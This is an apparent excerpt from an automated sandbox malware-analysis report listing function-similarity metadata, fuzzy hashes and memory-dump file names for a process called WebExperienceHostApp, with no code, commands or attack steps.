                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: free
                                                                    • String ID: P($@R(
                                                                    • API String ID: 1294909896-1293723733
                                                                    • Opcode ID: a677518fa27c5f8d48adccc261005f7c3989c304e9b3d318f7d62f1f7a3e4e0d
                                                                    • Instruction ID: 2d12c0a1401baa09664c97cb00b381771b222c617f8d82a0b6c6c0ad9ba99da3
                                                                    • Opcode Fuzzy Hash: a677518fa27c5f8d48adccc261005f7c3989c304e9b3d318f7d62f1f7a3e4e0d
                                                                    • Instruction Fuzzy Hash: 37117C25A09E1381EB14DB59E4612692BA0EFC8BC4F944032DB8D4777FDF6DE89AC340
                                                                    APIs
                                                                    • ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB00
                                                                    • ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB08
                                                                    • ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB11
                                                                    • __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB2D
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: ___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_func
                                                                    • String ID:
                                                                    • API String ID: 3203701943-0
                                                                    • Opcode ID: e28adfae1c249bda0afd0f7cf76bd22d5b083521ec3e54fdc1464557419da4a5
                                                                    • Instruction ID: be2f90c01304cdff047076526654659096f166e459f6bd50a844040d002f6fd1
                                                                    • Opcode Fuzzy Hash: e28adfae1c249bda0afd0f7cf76bd22d5b083521ec3e54fdc1464557419da4a5
                                                                    • Instruction Fuzzy Hash: 0701C8A2E15B5286DB458F79D400078BBA0FB98F88B14D236DA4E87729DBBCD4C28710
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: free
                                                                    • String ID: @R($P(
                                                                    • API String ID: 1294909896-3807004134
                                                                    • Opcode ID: 4c118b032e9c73e1c793e6eb58cc2b2f397da3bff51285a3375a41a53c5952be
                                                                    • Instruction ID: 20913b6174413ad898c51def5f45fd78a57272f9682cdf6a2aecca564dbb68a8
                                                                    • Opcode Fuzzy Hash: 4c118b032e9c73e1c793e6eb58cc2b2f397da3bff51285a3375a41a53c5952be
                                                                    • Instruction Fuzzy Hash: 07114625A09A4781EB14DB49E4543682BA1EB84BC8F944032DB8D0777ADF6CE896C300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: malloc
                                                                    • String ID: MOC$RCC$csm
                                                                    • API String ID: 2803490479-2671469338
                                                                    • Opcode ID: 99de963a1fe55b9bd7a0891b46763f532adfc88203a95788734ee6b425dadccb
                                                                    • Instruction ID: 61865fb1a7a2b87e0ec042fb8a8267145d165b2dbf84499afae6d32516988055
                                                                    • Opcode Fuzzy Hash: 99de963a1fe55b9bd7a0891b46763f532adfc88203a95788734ee6b425dadccb
                                                                    • Instruction Fuzzy Hash: 0F01D8B9E49103C2EB699E51915417866A1EFD8B84F989032CB0D077BFCE2CE8458702
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateErrorFile2HandleLastPointer
                                                                    • String ID:
                                                                    • API String ID: 3074824862-0
                                                                    • Opcode ID: 0cd72fde80447eeb56bad4721d4aaa63301966e39746875d89a672b024a734dd
                                                                    • Instruction ID: 3a0ce3c56d27b56d66976c5cf0f582b1c05d9933c0d6d4635da744d178c703bb
                                                                    • Opcode Fuzzy Hash: 0cd72fde80447eeb56bad4721d4aaa63301966e39746875d89a672b024a734dd
                                                                    • Instruction Fuzzy Hash: 05F0F915F19A6343FB5087A5740163A19D0AFC9BF0F884231EF6D43BEACE5CD8858700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: free
                                                                    • String ID: @R(
                                                                    • API String ID: 1294909896-853787646
                                                                    • Opcode ID: e01fa5ed53f3a4895c7591c5bea2c7d990d774a0cdecb02d5ec00bf01ea059c4
                                                                    • Instruction ID: 0d0f2536641e8f327582ca9031f8dfd94357e5befaf8ff2bcdc86a048b04be3f
                                                                    • Opcode Fuzzy Hash: e01fa5ed53f3a4895c7591c5bea2c7d990d774a0cdecb02d5ec00bf01ea059c4
                                                                    • Instruction Fuzzy Hash: D8F01D22619F0382DB449B19E59016867B4EBC8BD4F544032DB8D03B7ADFBCE8958300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: free
                                                                    • String ID: @R(
                                                                    • API String ID: 1294909896-853787646
                                                                    • Opcode ID: 13d6b93d7afaa9b0249f323a7612b5993f3595e5392c3a1c33a23faceb5c3cc5
                                                                    • Instruction ID: 8b675bb48971d32b3d5f1e782c7611b6e4007520ac3778fb038d2c0d4437330d
                                                                    • Opcode Fuzzy Hash: 13d6b93d7afaa9b0249f323a7612b5993f3595e5392c3a1c33a23faceb5c3cc5
                                                                    • Instruction Fuzzy Hash: 6FF01D21619F0382EB449B15E59016867B4EBC8BD0F544032DB8D03B7ADFBCE8958300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: free
                                                                    • String ID: @R(
                                                                    • API String ID: 1294909896-853787646
                                                                    • Opcode ID: 311ffdb8faa09e0ead53af376f3f16983548877c287860f2116317904bcf37df
                                                                    • Instruction ID: 0381550695b1625616d0630e4777716477955462581024ae8dd266fd47f2d376
                                                                    • Opcode Fuzzy Hash: 311ffdb8faa09e0ead53af376f3f16983548877c287860f2116317904bcf37df
                                                                    • Instruction Fuzzy Hash: 57F01D25619F0382DB459B16E59026867B4EBC8BD0F544032DB8D03B7ADFBCE8958300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: free
                                                                    • String ID: P($@R(
                                                                    • API String ID: 1294909896-1293723733
                                                                    • Opcode ID: b21111f2f01a996cdf5c1c75ad8b64239b79ef686f16861f688bd8f43cb3f9e7
                                                                    • Instruction ID: 2719809b97b150e2396f0ff19447968625e8f805a155fcdd6057c4474efaf636
                                                                    • Opcode Fuzzy Hash: b21111f2f01a996cdf5c1c75ad8b64239b79ef686f16861f688bd8f43cb3f9e7
                                                                    • Instruction Fuzzy Hash: E2F01C35A49A0382EA18DB65E85013827B4EB98B44B640032DB4D8637ADF6CEC96C300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: free
                                                                    • String ID: @R(
                                                                    • API String ID: 1294909896-853787646
                                                                    • Opcode ID: 96c44796cacde1bdba4a0612f47b390691b0c5c621480ea22f4fd18a6abbd32f
                                                                    • Instruction ID: e42e7fa15b4c67b1f241a4c6ac3e88fa91dc4cf93c6ae216f0c10f512435a3c8
                                                                    • Opcode Fuzzy Hash: 96c44796cacde1bdba4a0612f47b390691b0c5c621480ea22f4fd18a6abbd32f
                                                                    • Instruction Fuzzy Hash: 54E09A35A15F13C2DB449F61E85406867B4EBC8F95B640073DA8D42339DFBCE89AC300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: free
                                                                    • String ID: @R($P(
                                                                    • API String ID: 1294909896-3807004134
                                                                    • Opcode ID: ba7d5fcdeca7e42e582ac1da278be79fdbf2a1abd4628488c3ce9e7dfbec58c5
                                                                    • Instruction ID: ce9957eb42581c00b31a10b6900c482f558bc95cd499e61a2f80f7f25290baa0
                                                                    • Opcode Fuzzy Hash: ba7d5fcdeca7e42e582ac1da278be79fdbf2a1abd4628488c3ce9e7dfbec58c5
                                                                    • Instruction Fuzzy Hash: 65E01275905A0782EB109F51D45022437B4EB88B59F540033CA8C02335DF7CD896C340
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: free
                                                                    • String ID: @R(
                                                                    • API String ID: 1294909896-853787646
                                                                    • Opcode ID: b65dafd4f0345cf50e236d3ffe1f136317cca043b08921e7c385bcf79bcd8037
                                                                    • Instruction ID: f92b1ea7ce5c0c001fd9ae116867e7121571184160fc8f8e7a44d53c102cd434
                                                                    • Opcode Fuzzy Hash: b65dafd4f0345cf50e236d3ffe1f136317cca043b08921e7c385bcf79bcd8037
                                                                    • Instruction Fuzzy Hash: FBE09A35A15F13C2DB449F61E85406867B4EBC8F95B640073DA9D42339DFBCE89AC300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: free
                                                                    • String ID: @R(
                                                                    • API String ID: 1294909896-853787646
                                                                    • Opcode ID: 7c6157ca397b0088499bd56f385209df40795a8ead6873b2b5f29ead13bee64c
                                                                    • Instruction ID: 4d19d968b1a4d06cd052788f9af7858b75d39c48968c552c04cdb6dd3d0b6e7f
                                                                    • Opcode Fuzzy Hash: 7c6157ca397b0088499bd56f385209df40795a8ead6873b2b5f29ead13bee64c
                                                                    • Instruction Fuzzy Hash: 27E09A35A15F13C2DB449F61E85506867B4FB88F95B640073DA8D42339DFACE89AC300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturnmemcpy
                                                                    • String ID: 0123456789-
                                                                    • API String ID: 931391446-3850129594
                                                                    • Opcode ID: 7264b870818fb0f69d8a1a77900bcf26002443e7252339213ad7f73e304bd3b5
                                                                    • Instruction ID: d83509146d5a4db5c7482fd31111f65201e15ef0bce17c6f1eed551ea23c97d4
                                                                    • Opcode Fuzzy Hash: 7264b870818fb0f69d8a1a77900bcf26002443e7252339213ad7f73e304bd3b5
                                                                    • Instruction Fuzzy Hash: 93716062B19B5689EB00CFA5D4502AC3775EB89B88F444136DF4E17BADDE3CD549C340
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturnswprintf_s
                                                                    • String ID: %.0Lf
                                                                    • API String ID: 296878162-1402515088
                                                                    • Opcode ID: 3b16c76f99806dfa4a0cf6affe3c77ff5d81f2a5c6144b3f11b4eac95df9b14a
                                                                    • Instruction ID: 01168b45a83f65adbc34a9033ed85bf3381fb441f0dd23834077e832b8079c8c
                                                                    • Opcode Fuzzy Hash: 3b16c76f99806dfa4a0cf6affe3c77ff5d81f2a5c6144b3f11b4eac95df9b14a
                                                                    • Instruction Fuzzy Hash: F0717E22B08F968AEB01CB66E4402AD77B1EF99798F044136EF8D17B6ADF38D445C340
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturnswprintf_s
                                                                    • String ID: %.0Lf
                                                                    • API String ID: 296878162-1402515088
                                                                    • Opcode ID: b571ce2853cddf76524b4741eca339f0dced9dcfb565cacf30ea4cebfa2c42ba
                                                                    • Instruction ID: 5ec853c52317e3f78991e5573afdf3833b1c1e98d2dadb7a44c91c2c65bdae74
                                                                    • Opcode Fuzzy Hash: b571ce2853cddf76524b4741eca339f0dced9dcfb565cacf30ea4cebfa2c42ba
                                                                    • Instruction Fuzzy Hash: 01716F22B08B968AEB01CB65E8402AD77B1EF95794F144136EF8D17B6ADF3CD446C340
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: rand_s
                                                                    • String ID: invalid random_device value
                                                                    • API String ID: 863162693-3926945683
                                                                    • Opcode ID: 5bf917cb6cc27b8f8c101cf21685ef46c4f3be592fb91b1d19001d2cd564a4a4
                                                                    • Instruction ID: 1c36e87b623c5544ab1ca8980100f09ea7ef38f3f0d0b002fe4a8b516188cae0
                                                                    • Opcode Fuzzy Hash: 5bf917cb6cc27b8f8c101cf21685ef46c4f3be592fb91b1d19001d2cd564a4a4
                                                                    • Instruction Fuzzy Hash: C051A622D18E4785F652DB3454911BA6B68FF96384F148732E75E367BBDF2CE4D28200
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1883312675.00007FFE13301000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000006.00000002.1883278501.00007FFE13300000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883363676.00007FFE13316000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883384636.00007FFE13317000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe13300000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: abort$CreateFrameInfo
                                                                    • String ID: csm
                                                                    • API String ID: 2697087660-1018135373
                                                                    • Opcode ID: 809b0197d0f15b3009e55adb189ff641ea3fee3a4527357fb56d218a418e2097
                                                                    • Instruction ID: 0b438b186ef177d8b26206712cc4d85cd0b23f478afbd11959e9a643addf347e
                                                                    • Opcode Fuzzy Hash: 809b0197d0f15b3009e55adb189ff641ea3fee3a4527357fb56d218a418e2097
                                                                    • Instruction Fuzzy Hash: 1D515F77A18B818AD6609F16E04026E77B4FB98BB1F100174EB9D27B65DF3CE451CB08
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: ActivationCreateFactoryReferenceStringWindows
                                                                    • String ID: Windows.Foundation.Diagnostics.AsyncCausalityTracer
                                                                    • API String ID: 1966789792-167870777
                                                                    • Opcode ID: 7c7924330cc76eb3eba570e8f5a043d3487a3d96d7dca579302cae01b3451e79
                                                                    • Instruction ID: c269a0161785049a4f868a9c007f26365ccfcc098230d98e48affa41a02280bc
                                                                    • Opcode Fuzzy Hash: 7c7924330cc76eb3eba570e8f5a043d3487a3d96d7dca579302cae01b3451e79
                                                                    • Instruction Fuzzy Hash: C3318E22B19A8782EB14CB25D4543B927A0FFC9B88F504432DB9D477BADF3DEA458700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: ContextExceptionObjectThrow
                                                                    • String ID: Context callback failed.
                                                                    • API String ID: 1677907432-1244723342
                                                                    • Opcode ID: e19a649699645cc43410b51faacb8ed42f9f502b8979f275351cd23fa70905b7
                                                                    • Instruction ID: 580b55b262afb30040c986aecc250db6c4116468842e644ae9d876342c83b6ed
                                                                    • Opcode Fuzzy Hash: e19a649699645cc43410b51faacb8ed42f9f502b8979f275351cd23fa70905b7
                                                                    • Instruction Fuzzy Hash: DB316BA2A08A0781EE50CF64E4843B96BA4EF84B84F540436DB8D4677ADF6CE984C740
                                                                    APIs
                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00007FFE002832B5
                                                                      • Part of subcall function 00007FFE002D2B1C: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE00285AA8), ref: 00007FFE002D2B36
                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE002857AA,?,?,?,00007FFE002843F8), ref: 00007FFE002832AE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
